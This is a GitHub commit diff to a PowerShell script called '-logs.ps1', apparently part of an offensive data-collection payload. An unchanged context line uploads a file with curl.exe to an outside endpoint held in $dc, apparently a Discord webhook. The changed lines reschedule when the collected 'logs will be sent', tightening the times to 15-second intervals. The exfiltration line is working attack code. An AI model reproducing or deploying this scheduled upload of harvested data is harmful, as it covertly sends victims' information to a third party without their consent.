Update -logs.ps1

This commit is contained in:
I-Am-Jakoby 2022-12-24 00:07:06 -06:00 committed by GitHub
parent c37f6c4133
commit 206039521f
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -30,10 +30,10 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc}
# times logs will be sent [keep in military time] # times logs will be sent [keep in military time]
$logTimes = @( $logTimes = @(
'00:00:00', '00:20:00',
'01:00:00', '00:20:15',
'02:00:00', '00:20:30',
'03:00:00', '00:20:45',
'04:00:00', '04:00:00',
'05:00:00', '05:00:00',
'06:00:00', '06:00:00',